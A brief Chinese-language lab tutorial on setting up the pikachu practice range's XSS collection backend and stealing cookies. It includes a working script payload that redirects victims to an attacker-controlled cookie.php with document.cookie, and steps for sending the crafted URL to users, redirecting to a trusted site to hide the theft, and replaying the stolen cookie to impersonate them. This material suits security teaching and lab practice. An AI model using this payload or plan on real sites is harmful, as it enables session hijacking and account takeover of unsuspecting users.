XSS平台搭建及Cookie获取
准备工作
利用pikachuXSS后台
pikachu\pkxss\inc目录下的config.inc.php
修改mysql用户名密码
登录后台
pikachu\pkxss\xcookie目录解读
cookie.php
获取cookie的API页面并存到攻击者平台数据库中
获取完后才能重定向一个可信网站,起到迷惑用户隐藏攻击过程的作用
pkxss_cookie_result.php
对应攻击者后台页面
操作
payload
<script>document.location = 'http://192.168.0.101/pikachu/pkxss/xcookie/cookie.php?cookie=' + document.cookie;</script>
//通过document.location 实例进行重定向到http://127.0.0.1/pikachu/pkxss/xcookie/cookie.php?cookie=
具体思路
在公网上搭建一个平台
在有输入参数的地方写入payload
构造一个写入了payload的xss地址
把这个URL地址发给用户
用户收到地址后点击地址,cookie就被窃取到攻击者搭建好的平台
攻击者拿到用户的cookie之后
通过抓包修改cookie就可以以用户的身份来访问网站了